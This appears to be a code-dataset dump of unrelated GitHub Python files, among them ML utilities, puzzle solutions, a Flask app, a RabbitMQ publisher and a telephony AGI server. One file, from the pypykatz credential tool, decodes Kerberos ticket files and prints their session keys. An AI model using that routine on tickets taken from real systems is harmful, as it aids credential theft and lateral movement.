models.__dict__[arch](\n num_classes=num_classes,\n depth=depth,\n block_name=block_name)\n \n experts[loi] = experts[loi].cuda()\n \n initialize_with_router = True\n if (initialize_with_router):\n experts[loi].load_state_dict(chk['state_dict'])\n\n finetune_experts = True\n if (finetune_experts):\n eoptimizers[loi] = optim.SGD([{'params': experts[loi].layer1.parameters(), 'lr': 0.0},\n {'params': experts[loi].layer2.parameters(), 'lr': 0.0},\n {'params': experts[loi].layer3.parameters(), 'lr': 0.01},\n {'params': experts[loi].fc.parameters()}],\n lr=0.01, momentum=0.9, weight_decay=5e-4)\n \n else:\n eoptimizers[loi] = optim.SGD(experts[loi].parameters(), lr=0.1, momentum=0.9,\n weight_decay=5e-4)\n \n \n return experts, eoptimizers\n\n\n\ndef make_router_and_optimizer(num_classes,\n dataset,\n arch,\n depth,\n block_name,\n learning_rate,\n load_weights=False):\n model = models.__dict__[arch](\n num_classes=num_classes,\n depth=depth,\n block_name=block_name)\n if (load_weights):\n #model = torch.nn.DataParallel(model).cuda()\n model = model.cuda()\n print ('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n chk = torch.load('./ck_backup/%s/%s-depth-%s/checkpoint/model_best.pth.tar'%(dataset, arch, depth))\n model.load_state_dict(chk['state_dict'])\n \n optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9,\n weight_decay=5e-4)\n return model, optimizer\n","repo_name":"IamYourAlpha/Expert-Aware-Router-EAR","sub_path":"model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28276164926","text":"'''\r\n\r\nGiven an integer array nums and an integer k, return true if there are two distinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\r\n\r\n \r\n\r\nExample 1:\r\n\r\nInput: nums = [1,2,3,1], k = 3\r\nOutput: true\r\nExample 2:\r\n\r\nInput: nums = [1,0,1,1], k = 1\r\nOutput: true\r\nExample 3:\r\n\r\nInput: nums = [1,2,3,1,2,3], k = 2\r\nOutput: false\r\n \r\n\r\n\r\n\r\n'''\r\n\r\n\r\n\r\nclass Solution(object):\r\n def containsNearbyDuplicate(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: bool\r\n \"\"\"\r\n \r\n\r\n cache_dict = {}\r\n for idx in range(len(nums)):\r\n if nums[idx] in cache_dict and abs(idx - cache_dict[nums[idx]]) <= k:\r\n return True\r\n cache_dict[nums[idx]] = idx\r\n return False\r\n\r\n\r\n ","repo_name":"nilesh23041999/DSA-Daily","sub_path":"leetcode_219_duplicate_2.py","file_name":"leetcode_219_duplicate_2.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37937864937","text":"def readPGM(file):\n _ = file.readline()\n wh = file.readline()\n if str(wh).find('#') != -1:\n wh = file.readline()\n (width, height) = [int(i) for i in wh.split()]\n depth = int(file.readline())\n image = []\n for y in range(height):\n row = []\n for y in range(width):\n row.append(ord(file.read(1)))\n image.append(row)\n file.close()\n return depth, image\n\ndef writePGM(file, w, h, depth, flatImg):\n file.write('P5\\n'.encode())\n file.write('{} {}\\n'.format(w, h).encode())\n file.write('{}\\n'.format(depth).encode())\n file.write(bytearray(flatImg))\n file.close()\n","repo_name":"Akaifox16/DIP_HW1","sub_path":"pgmf.py","file_name":"pgmf.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2713323580","text":"import random\nimport time\n\ndef selection_sort(list_s):\n comparison = 0\n for i in range(len(list_s)-1):\n minimum = list_s[i]\n min_index = i\n j = i + 1\n while j < len(list_s):\n if list_s[j] < minimum:\n minimum = list_s[j]\n min_index = j\n comparison += 1\n j += 1\n temp = list_s[i]\n list_s[i] = minimum\n list_s[min_index] = temp\n return comparison\n \ndef insertion_sort(list_i):\n comparison = 0\n for static in range(1,len(list_i)):\n moving = static \n while list_i[moving] < list_i[moving-1] and moving > 0:\n temp = list_i[moving]\n list_i[moving] = list_i[moving-1]\n list_i[moving-1] = temp\n moving -= 1\n comparison += 1\n if moving > 0:\n comparison +=1\n return comparison\n\n \n\ndef main():\n # Give the random number generator a seed, so the same sequence of \n # random numbers is generated at each run\n random.seed(1234) \n \n # Generate 5000 random numbers from 0 to 999,999\n randoms = random.sample(range(1000000), 1000)\n start_time = time.time() \n comps = selection_sort(randoms)\n stop_time = time.time()\n print(comps, stop_time - start_time)\n\nif __name__ == '__main__': \n main()\n\n","repo_name":"JonathanShan/Sorts","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32385844709","text":"#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport argparse\r\nimport traceback\r\nimport sys\r\n\r\nfrom services import api_request\r\nfrom services import output\r\n\r\ndef get_args():\r\n #argparseを使ったコマンドライン引数の取得\r\n parser = argparse.ArgumentParser(description='YouTube Api')\r\n parser.add_argument('--api_key', dest='api_key', type=str, help='Youtube Data Api Key', required=True)\r\n parser.add_argument('-o', '--output', dest='output', type=str, help='OUT PUT')\r\n\r\n # function 使用する関数\r\n subparsers = parser.add_subparsers()\r\n\r\n # channel\r\n get_channel_parser = subparsers.add_parser('channel', help='Get Youtube Channel Data')\r\n get_channel_parser.add_argument('channel_id', help='Channel Id') # チャンネルID\r\n get_channel_parser.set_defaults(func=api_request.channel) # 実行する関数設定\r\n\r\n # videos\r\n get_channel_parser = subparsers.add_parser('videos', help='Get Youtube Videos Data')\r\n get_channel_parser.add_argument('q', help='serch words') # チャンネルID\r\n get_channel_parser.set_defaults(func=api_request.videos) # 実行する関数設定\r\n\r\n return parser.parse_args()\r\n\r\n\r\ndef main():\r\n # コマンドライン引数の取得\r\n args = get_args()\r\n\r\n #アプリケーション内部の実装\r\n try:\r\n res = args.func(args)\r\n\r\n if args.output is not None:\r\n output.file(res, args.output)\r\n print(args.output + 'に保存されました')\r\n\r\n #終了ステータスの定義\r\n print(res)\r\n\r\n #エラーの出力\r\n except :\r\n print('#' * 5 + 'エラーが発生して処理を中断しました' + '#' * 5)\r\n print(traceback.format_exc(sys.exc_info()[2]))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"bacle-nuage/youtube_data_api","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38541059709","text":"class TempDatas(object):\n '''全局变量'''\n def __init__(self):\n #\n self.iStatus = 2 # 炉位状态 0 正常检测 1 断头 2 暂停 \n self.pauseTimes = 0\n self.runflag = False # 是否开始检测\n self.grayFrame = None\n self.rgbFrame = None\n self.captured = False\n self.isDead = False\n self.condition = 0\n self.pageCondition = 0\n self.perviewflag = False\n self.firstFrame = None\n #学习和识别\n self.startflag = True\n self.machineStart = False\n self.index = 0\n self.avgValues = [0,0,0,0,0,0]\n self.spiltPerValues = [0,0,0,0,0,0]\n self.condition = 0\n self.normalNum = 0\n #检测数据\n self.detectNum = 0\n self.errorTimes = 0\n self.errortype = 0\n self.loubanfenbu = [0,0,0,0,0,0]\n self.senderrorCount = 0\n self.SendErrorList = []\n self.startShangtou = 0 \n self.endShangtou = 0\n self.timeShangtou = 0\n self.shangtouSucess = 0\n self.ShangtouSucessTime = 0\n #漏板从左到右,六个区域\n self.leftleft = 0\n self.leftright = 0\n self.midleft = 0\n self.midright = 0\n self.rightleft = 0\n self.rightright = 0\n self.interval = 0","repo_name":"Mittenss2010/FiberWinding","sub_path":"button_SaveImage_version/scripts/TempDatas.py","file_name":"TempDatas.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19874681648","text":"#Advent of Code 2022: Day 18\nfrom datetime import datetime\nfrom collections import deque\nstart = datetime.now()\ndef create_cubes(lines):\n cubes = set()\n for line in lines:\n cube = tuple(map(int,line.split(\",\")))\n cubes.add(cube)\n return cubes\n \ndef create_directions():\n directions = []\n all_directions = set([(x, y, z) for x in range(-1,2) for y in range(-1, 2) for z in range(-1,2)])\n for direction in all_directions:\n if manhDistance(direction, (0,0,0)) == 1:\n directions.append(direction)\n return directions\n \ndef tuple_sum(a,b):\n return tuple([x + y for x, y in zip(a,b)])\n \ndef manhDistance(a, b):\n return sum(abs(val1-val2) for val1, val2 in zip(a,b))\n \ndef check_neighbour(cube):\n open_sides = 6\n for direction in directions:\n neighbour = tuple_sum(direction, cube)\n if neighbour in cubes:\n open_sides -= 1\n return open_sides\n \ndef check_sides(cubes):\n counter = 0\n for cube in cubes:\n open_sides = check_neighbour(cube)\n counter += open_sides\n return counter\n \ndef count_surface(water_surface):\n counter = 0\n for cube in cubes:\n for direction in directions:\n if tuple_sum(direction, cube) in water_surface:\n counter += 1\n return counter\n \n#MAIN\nwith open(\"data.txt\") as file:\n lines = file.read().splitlines()\ncubes = create_cubes(lines)\ndirections = create_directions()\n \n#Cuve 3x3x3 with mid segment+one corner missing\n#cubes = set((x,y,z) for x in range(2,5) for y in range(2,5) for z in range(2,5))\n#cubes.remove((3,3,3))\n#cubes.remove((2,2,2))\n \n#Task1:\ntask1 = check_sides(cubes)\nprint(\"Task 1:\", task1)\nprint(\"Runtime:\", datetime.now()-start)\n \n#Task2\nmax_size = 24\nall_cubes = set((x,y,z) for x in range(-1, max_size+1) for y in range(-1, max_size+1) for z in range(-1,max_size+1))\nstart_cube = (1,1,1)\nqueue = deque([start_cube])\nwater_surface = set()\nwhile queue:\n current_cube = queue[0]\n for direction in directions:\n neighbour = tuple_sum(direction, current_cube)\n if neighbour in all_cubes and neighbour not in cubes:\n #if check_neighbour(neighbour) <= 5:\n water_surface.add(neighbour)\n queue.append(neighbour)\n all_cubes.remove(neighbour)\n queue.popleft()\n \n# size = 6\n# for z in range(0,size):\n# print(\"Layer:\",z)\n# for y in range(0,size):\n# for x in range(0,size):\n# if (x,y,z) in cubes:\n# print(\"#\", end=\"\")\n# elif (x,y,z) in water_surface:\n# print(\".\", end=\"\")\n# else:\n# print(\" \", end=\"\")\n# print(\" \")\n# print(\" \")\n \nprint(count_surface(water_surface))","repo_name":"trohat/AdventOfCode2022","sub_path":"D18/d18-los.py","file_name":"d18-los.py","file_ext":"py","file_size_in_byte":2733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"81277043","text":"from flask import Flask, render_template, request\n\n\nfrom kantei_main import kantei_uma\nfrom kantei_main import kantei_kisyu\n\n\n\n#配列をグローバル変数と指定\n#uma\n#kisyu\n\nglobal uma\nglobal kisyu\nglobal kusei_nen\nglobal kusei_tuki\nglobal kusei_hi\n\n\n\n\numa = []\nkisyu = []\n\nkusei_nen = \"\"\nkusei_tuki = \"\"\nkusei_hi = \"\"\n\ndata_kusei = []\n\n\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/kakusu_select\", methods=['GET', 'POST'])\n\n#index.htmlからの遷移\ndef kakusu_select():\n if request.method == 'POST':\n # POSTデータを取得\n user_data = request.form\n kusei_nen = request.form.get('kusei_nen')\n kusei_tuki = request.form.get('kusei_tuki') \n kusei_hi = request.form.get('kusei_hi')\n seletc_form_id = request.form.get('select_form_id')\n \n data_kusei.append(kusei_nen)\n data_kusei.append(kusei_tuki)\n data_kusei.append(kusei_hi)\n\n \n\n if seletc_form_id == \"kisyu\":\n return render_template(\"kisyu_form.html\",data_kusei = data_kusei)\n elif seletc_form_id == \"uma\":\n return render_template(\"uma_form.html\",data_kusei = data_kusei)\n else:\n return render_template(\"no-kakusu.html\")\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/kisyu_form\", methods=['GET', 'POST'])\ndef kisyu_form():\n\n if request.method == 'POST':\n # POSTデータを取得\n #uma = request.form.getlist('uma') \n kusei_nen = request.form.get('kusei_nen')\n kusei_tuki = request.form.get('kusei_tuki')\n kusei_hi = request.form.get('kusei_hi')\n\n \n kisyu = []\n for i in range(1, 19):\n kisyu.append(request.form['kisyu' + str(i)])\n\n\n kotae = kantei_kisyu(kisyu,kusei_nen,kusei_tuki,kusei_hi)\n \n if kotae[0] == \"errer\":\n return render_template(\"errer.html\",kotae = kotae)\n elif kotae[0] != \"errer\":\n return render_template(\"kisyu_kantei.html\",kotae = kotae)\n else:\n return render_template(\"no-kakusu.html\")\n\n\n@app.route(\"/uma_form\", methods=['GET', 'POST'])\ndef uma_form():\n if request.method == 'POST':\n # POSTデータを取得\n kusei_nen = request.form.get('kusei_nen')\n kusei_tuki = request.form.get('kusei_tuki')\n kusei_hi = request.form.get('kusei_hi')\n\n \n uma = []\n for i in range(1, 19):\n uma.append(request.form['uma' + str(i)]) \n \n kotae = kantei_uma(uma,kusei_nen,kusei_tuki,kusei_hi)\n \n \n if kotae[0] == \"errer\":\n return render_template(\"errer.html\",kotae = kotae)\n elif kotae[0] != \"errer\":\n return render_template(\"uma_kantei.html\",kotae = kotae)\n else:\n return render_template(\"no-kakusu.html\") \n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"miracle777/uma_kisyu_aisyo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4211048376","text":"import sys\n\nmy_list = [1, 1, 2, 2, 3, 3, 4, 4, 5, 5] # Fill this list to test the implementations!\n\ndef sum_A(l):\n prev = sys.maxsize\n s = 0\n for i in range(len(l)):\n if (l[i] < prev):\n prev = l[i]\n s += l[i]\n return s\n\n\ndef sum_B(l):\n prev = sys.maxsize\n s = 0\n for i in range(len(l)):\n if (l[i] < prev):\n prev = l[i]\n s += l[i]\n return sum(l)\n \n\ndef sum_C(l):\n prev = sys.maxsize\n s = 0\n for i in range(len(l)):\n if (l[i] < prev):\n prev = l[i]\n s += l[i]\n return s\n\n\ndef sum_D(l):\n s = 0\n for i in range(len(l)):\n if (l[i] > 0):\n s += l[i]\n return s\n\n\ndef sum_E(l):\n s = 0\n if len(l) == 0:\n return -1\n for i in range(len(l)):\n s += l[i]\n return s\n\n\nprint(\"Implementation A\", sum_A(my_list))\nprint(\"Implementation B\", sum_B(my_list))\nprint(\"Implementation C\", sum_C(my_list))\nprint(\"Implementation D\", sum_D(my_list))\nprint(\"Implementation E\", sum_E(my_list))","repo_name":"iPwnds/Python","sub_path":"TU Delft/summation.py","file_name":"summation.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74336313446","text":"import simpy\nenv=simpy.Environment()\n\ndef driver(env, car):\n yield env.timeout(3)\n car.action.interrupt()\nclass Car(object):\n def __init__(self,env) -> None:\n self.env=env\n\n self.action=env.process(self.run())\n\n def run(self):\n\n while True:\n print('Start parking and charging at ', self.env.now)\n try:\n yield self.env.process(self.charge(5))\n except simpy.Interrupt:\n print('Battery is full enough')\n \n print('start driving', self.env.now)\n yield self.env.timeout(2)\n\n def charge(self, duration):\n \n yield self.env.timeout(duration)\n\ncar=Car(env)\nenv.process(driver(env, car))\nenv.run(until=15)\n","repo_name":"dineshbodala/simpy-simulations","sub_path":"carcharging(interruption).py","file_name":"carcharging(interruption).py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71259112487","text":"import logging\nimport time\nimport json\nimport asyncio\nfrom constants import *\nfrom rabbitmq_async_client import rabbitmq_async_client\n\nlogging.basicConfig(level = logging.INFO)\n\nasync def main() -> None:\n\n # Read messages from file\n with open(MESSAGES_FILE_PATH, 'r') as f:\n messages_dict = json.load(f)\n\n # Sleep for 20 seconds to allow RabbitMQ to come up\n logging.info('Sleeping for 20 seconds to allow RabbitMQ to come up')\n time.sleep(20)\n\n rabbitmq_client = rabbitmq_async_client(RABBIT_MQ_URL)\n\n # Create TEST_QUEUE\n await rabbitmq_client.create_queue(TEST_QUEUE) \n\n # Publish messages to TEST_QUEUE\n try: \n await asyncio.gather(*[rabbitmq_client.publish_message(TEST_QUEUE, message) for message in messages_dict])\n except Exception as e:\n logging.error('Error publishing message: {}'.format(str(e)))\n\n await rabbitmq_client.close()\n\nif __name__ == \"__main__\":\n asyncio.run(main())","repo_name":"Zachery2008/rabbitmq-python-client-docker-example","sub_path":"src/publisher_async.py","file_name":"publisher_async.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39752931611","text":"import json\nimport numpy as np\n\n\n\n\n\ndef get_json_params(file_path):\n params = []\n with open(file_path, 'r') as f:\n params = json.load(f)\n return params\n\ndef get_txt_params(file_path, splitStr=' '):\n params = []\n with open(file_path,'r') as f:\n for line in f:\n params.append(list(line.strip().split(splitStr)))\n return params\n\ndef get_label_map_palette(label_map_path):\n labels = get_json_params(label_map_path)\n palette = np.array([[0, 0, 0] for i in range(256)]).astype(np.uint8)\n for label in labels:\n palette[label['id'], 0] = label['vis']['r']\n palette[label['id'], 1] = label['vis']['g']\n palette[label['id'], 2] = label['vis']['b']\n return palette","repo_name":"KoapT/tf_train","sub_path":"projects/deeplab_v3plus/src/utils/param_file_access.py","file_name":"param_file_access.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7120399102","text":"\"\"\"Prunes model weights to keep just the necessary trained weights.\n\nExample usage:\n python scripts/prune_model_ckpt.py runs/gill_exp\n\"\"\"\n\nimport json\nimport os\nimport sys\nimport torch\n\n\nif __name__ == '__main__':\n model_dir = sys.argv[1]\n\n with open(os.path.join(model_dir, 'ckpt_best.pth.tar'), 'rb') as f:\n checkpoint = torch.load(f)\n\n with open(os.path.join(model_dir, 'model_args.json'), 'rb') as f:\n model_args = json.load(f)\n\n del checkpoint['epoch']\n del checkpoint['best_acc1']\n del checkpoint['optimizer']\n del checkpoint['scheduler']\n\n state_dict = {}\n for k, v in checkpoint['state_dict'].items():\n state_dict[k.replace('module.', '')] = v.detach().clone()\n\n checkpoint['state_dict'] = state_dict\n finetuned_tokens = checkpoint['state_dict']['model.input_embeddings.weight'][-model_args['num_tokens']:, :].detach().clone()\n checkpoint['state_dict']['model.input_embeddings.weight'] = finetuned_tokens\n\n with open(os.path.join(model_dir, 'pretrained_ckpt.pth.tar'), 'wb') as f:\n torch.save(checkpoint, f)","repo_name":"kohjingyu/gill","sub_path":"scripts/prune_model_ckpt.py","file_name":"prune_model_ckpt.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"53"} +{"seq_id":"39818411552","text":"# coding=utf-8\r\nfrom moviepy.editor import *\r\nfrom sys import argv\r\nimport os\r\nimport shutil\r\nimport uuid\r\nfrom props import readprops\r\n\r\n# 参数设置\r\nprops = readprops('gif.props')\r\nprint(props)\r\n\r\nmsg = '关注公众号 ttimeinv'\r\ncolor = 'red'\r\nfontsize = 30\r\n\r\nif '话术' in props:\r\n msg = props['话术']\r\nif '字体颜色' in props:\r\n color = props['字体颜色']\r\nif '字体大小' in props:\r\n fontsize = int(props['字体大小'])\r\n\r\ntxt_clip = TextClip(msg,fontsize=fontsize,color=color,font='msyh.ttf')\r\nfw,fh = txt_clip.size\r\n\r\nprint('读取gif')\r\nif not os.path.exists('gif'):\r\n print('gif文件夹不存在')\r\n exit(0)\r\n\r\nprint('清理dist')\r\nif os.path.exists('dist'):\r\n shutil.rmtree('dist')\r\nos.mkdir('dist')\r\n\r\nindex = -1\r\nfor file in os.listdir('gif'):\r\n if file.find('.') == 0:\r\n print('pass hidden file %s' % file)\r\n continue\r\n videoclip = VideoFileClip(os.path.join('gif',file))\r\n w,h = videoclip.size\r\n if fw > w or fh > h:\r\n print('字体太大 或 文字太长 放弃处理:%s' % file)\r\n continue\r\n index += 1\r\n print('开始处理第%d个:%s' % (index+1,file))\r\n os.mkdir(os.path.join('dist', str(index)))\r\n unit = (w-fw) / 9\r\n for i in range(9 + 1):\r\n txt_clip = txt_clip.set_position((i*unit,'bottom')).set_start(0).set_duration(videoclip.duration)\r\n video = CompositeVideoClip([videoclip, txt_clip])\r\n video.write_gif(os.path.join('dist', str(index), str(uuid.uuid4()) + '.gif'), fps=8, verbose=False)\r\n","repo_name":"laizhenhai88/pil","sub_path":"gif.py","file_name":"gif.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4931801547","text":"#!/usr/bin/env python\nfrom distutils.core import setup\nfrom setuptools import find_packages\nimport sys, os\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.md')).read()\n\nversion = '0.1.0'\n\ninstall_requires = open(os.path.join(here,\"requirements.txt\")).readline()\n\nsetup(name='lobo2',\n version=version,\n description=\"SUNET datasets\",\n long_description=README,\n classifiers=[\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n ],\n keywords='sunet datasets torrent',\n author='Leif Johansson',\n author_email='leifj@sunet.se',\n url='http://blogs.mnt.se',\n license='BSD',\n setup_requires=['nose>=1.0'],\n tests_require=['nose>=1.0', 'mock', 'jinja2', 'mockredispy'],\n test_suite=\"nose.collector\",\n packages=find_packages('src'),\n package_dir={'': 'src'},\n include_package_data=True,\n package_data={\n 'lobo2': ['templates/*.html',\n 'static/*',\n 'static/**/*'],\n },\n zip_safe=False,\n install_requires=install_requires,\n message_extractors={'src': [\n ('**.py', 'python', None),\n ('**/templates/**.html', 'jinja2', None),\n ]},\n)\n","repo_name":"SUNET/lobo2","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20123781032","text":"\n\nfrom minikerberos.protocol.asn1_structs import KRB_CRED, EncKrbCredPart, KRBCRED\nimport base64\n\ndef format_kirbi(data, n = 100):\n\tkd = base64.b64encode(data).decode()\n\treturn ' ' + '\\r\\n '.join([kd[i:i+n] for i in range(0, len(kd), n)])\n\ndef describe_kirbi_data(data):\n\tif isinstance(data, bytes):\n\t\tkirbi = KRB_CRED.load(data).native\n\telif isinstance(data, dict):\n\t\tkirbi = data\n\telif isinstance(data, KRB_CRED):\n\t\tkirbi = data.native\n\telif isinstance(data, KRBCRED):\n\t\tkirbi = data.native\n\telse:\n\t\traise Exception('Unknown data type! %s' % type(data))\n\t\n\tt = '\\r\\n'\n\tfor ticket in kirbi['tickets']:\n\t\tt += 'Realm : %s\\r\\n' % ticket['realm']\n\t\tt += 'Sname : %s\\r\\n' % '/'.join(ticket['sname']['name-string'])\n\n\tif kirbi['enc-part']['etype'] == 0:\n\t\tcred = EncKrbCredPart.load(kirbi['enc-part']['cipher']).native\n\t\tcred = cred['ticket-info'][0]\n\t\tusername = cred.get('pname')\n\t\tif username is not None:\n\t\t\tusername = '/'.join(username['name-string'])\n\t\tflags = cred.get('flags')\n\t\tif flags is not None:\n\t\t\tflags = ', '.join(flags)\n\n\t\tt += 'UserName : %s\\r\\n' % username\n\t\tt += 'UserRealm : %s\\r\\n' % cred.get('prealm')\n\t\tt += 'StartTime : %s\\r\\n' % cred.get('starttime')\n\t\tt += 'EndTime : %s\\r\\n' % cred.get('endtime')\n\t\tt += 'RenewTill : %s\\r\\n' % cred.get('renew-till')\n\t\tt += 'Flags : %s\\r\\n' % flags\n\t\tt += 'Keytype : %s\\r\\n' % cred['key']['keytype']\n\t\tt += 'Key : %s\\r\\n' % base64.b64encode(cred['key']['keyvalue']).decode()\n\n\tt += 'EncodedKirbi : \\r\\n\\r\\n'\n\tt += format_kirbi(KRB_CRED(kirbi).dump())\n\treturn t\n\ndef print_kirbi(data):\n\tprint(describe_kirbi_data(data))\n\n\n\ndef parse_kirbi(kirbifile):\n\twith open(kirbifile, 'rb') as f:\n\t\tprint_kirbi(f.read())","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/kerberos/kirbiutils.py","file_name":"kirbiutils.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"12407806618","text":"from __future__ import annotations\n\nimport signal\nimport logging\nimport socketserver\nimport time\nfrom contextlib import contextmanager\nfrom types import FrameType\n\nfrom typing import Callable, Any\n\nimport psycopg2\nfrom psycopg2.extras import DictCursor\nfrom sqlalchemy.engine.url import make_url\n\nfrom xivo import agitb\nfrom xivo import moresynchro\nfrom xivo_dao.helpers.db_utils import session_scope\n\nfrom wazo_agid.fastagi import FastAGI, FastAGIDialPlanBreak\n\nlogger = logging.getLogger(__name__)\n\nSetupFunction = Callable[[DictCursor], None]\nHandleFunction = Callable[[FastAGI, DictCursor, list], None]\n\nCONNECTION_TIMEOUT = 60\n\n_server: AGID = None # type: ignore[assignment]\n_handlers: dict[str, Handler] = {}\n\n\ndef info_from_db_uri(db_uri: str) -> dict[str, str | int]:\n parsed_url = make_url(db_uri)\n exceptions = {'database': 'dbname', 'username': 'user'}\n return {\n exceptions.get(name, name): value\n for name, value in parsed_url.translate_connect_args().items()\n }\n\n\nclass Database:\n def __init__(self, db_uri: str):\n self.connection_info = info_from_db_uri(db_uri)\n\n @contextmanager\n def connection(self):\n with psycopg2.connect(**self.connection_info) as connection:\n yield connection\n\n @contextmanager\n def transaction(self, connection: psycopg2.connection) -> DictCursor:\n try:\n with connection.cursor(cursor_factory=DictCursor) as cursor:\n yield cursor\n connection.commit()\n except psycopg2.DatabaseError:\n logger.debug(\"Database error encountered. Rolling back.\")\n connection.rollback()\n raise\n\n\nclass FastAGIRequestHandler(socketserver.StreamRequestHandler):\n config: dict[str, Any]\n\n def handle(self):\n try:\n logger.debug(\"handling request\")\n\n fagi = FastAGI(self.rfile, self.wfile, self.config)\n except_hook = agitb.Hook(agi=fagi)\n\n handler_name = fagi.env['agi_network_script']\n logger.debug(\"delegating request handling %r\", handler_name)\n with _server.database.connection() as conn:\n with _server.database.transaction(conn) as cursor:\n _handlers[handler_name].handle(fagi, cursor, fagi.args)\n\n fagi.verbose(f'AGI handler {handler_name!r} successfully executed')\n logger.debug(\"request successfully handled\")\n\n # Attempt to relay errors to Asterisk, but if it fails, we\n # just give up.\n # XXX It may be here that dropped database connection\n # exceptions could be caught.\n except FastAGIDialPlanBreak as message:\n logger.info(\"invalid request, dial plan broken\")\n\n try:\n fagi.verbose(message)\n # TODO: see under\n fagi.appexec('Goto', 'agi_fail,s,1')\n fagi.fail()\n except Exception:\n pass\n except Exception:\n logger.exception(\"unexpected exception\")\n try:\n except_hook.handle()\n # TODO: (important!)\n # - rename agi_fail, or find a better way\n # - move at the beginning of a safe block\n fagi.appexec('Goto', 'agi_fail,s,1')\n fagi.fail()\n except Exception:\n pass\n\n\nclass AGID(socketserver.ThreadingTCPServer):\n allow_reuse_address = True\n initialized = False\n request_queue_size = 20\n # Use Daemon threads to avoid memory leak in Python 3.7.\n # The ThreadingMixin in Python 3.7 sets daemon_threads to false, but block_on_close to True\n # and this causes a reference to accumulate over time and fills the memory.\n # Using daemon threads avoids this problem, and they will be killed along with the main\n # process if killed. This did not exist in Python 2.7. For reference:\n # https://salsa.debian.org/debian/python-prometheus-client/-/commit/5aa256d8aab3b81604b855dc03f260342fc391fb\n # Should be patched in later versions of Python so re-check after the upgrade to Bullseye\n daemon_threads = True\n\n def __init__(self, config: dict[str, Any]) -> None:\n logger.info('wazo-agid starting...')\n\n self.config = config\n signal.signal(signal.SIGHUP, sighup_handle)\n\n self.database = Database(self.config[\"db_uri\"])\n self.setup()\n\n FastAGIRequestHandler.config = config\n socketserver.ThreadingTCPServer.__init__(\n self, (self.listen_addr, self.listen_port), FastAGIRequestHandler\n )\n\n self.initialized = True\n\n def setup(self) -> None:\n if not self.initialized:\n self.listen_addr = self.config[\"listen_address\"]\n logger.debug(\"listen_addr: %s\", self.listen_addr)\n\n self.listen_port = int(self.config[\"listen_port\"])\n logger.debug(\"listen_port: %d\", self.listen_port)\n\n for i in range(1, CONNECTION_TIMEOUT + 1):\n try:\n with self.database.connection():\n pass\n break\n except psycopg2.OperationalError:\n if i < CONNECTION_TIMEOUT:\n time.sleep(1)\n continue\n logger.error('Connecting to database timed out. Giving up.')\n raise\n\n\nclass Handler:\n def __init__(\n self,\n handler_name: str,\n setup_fn: SetupFunction | None,\n handle_fn: HandleFunction,\n ) -> None:\n self.handler_name = handler_name\n self.setup_fn = setup_fn\n self.handle_fn = handle_fn\n self.lock = moresynchro.RWLock()\n\n def setup(self, cursor: DictCursor) -> None:\n if self.setup_fn:\n self.setup_fn(cursor)\n\n def reload(self, cursor: DictCursor) -> None:\n if self.setup_fn:\n if not self.lock.acquire_write():\n logger.error(\"deadlock detected and avoided for %r\", self.handler_name)\n logger.error(\"%r has not be reloaded\", self.handler_name)\n return\n try:\n self.setup_fn(cursor)\n logger.debug('handler %r reloaded', self.handler_name)\n finally:\n self.lock.release()\n\n def handle(self, agi: FastAGI, cursor: DictCursor, args: list[str]):\n self.lock.acquire_read()\n try:\n with session_scope():\n self.handle_fn(agi, cursor, 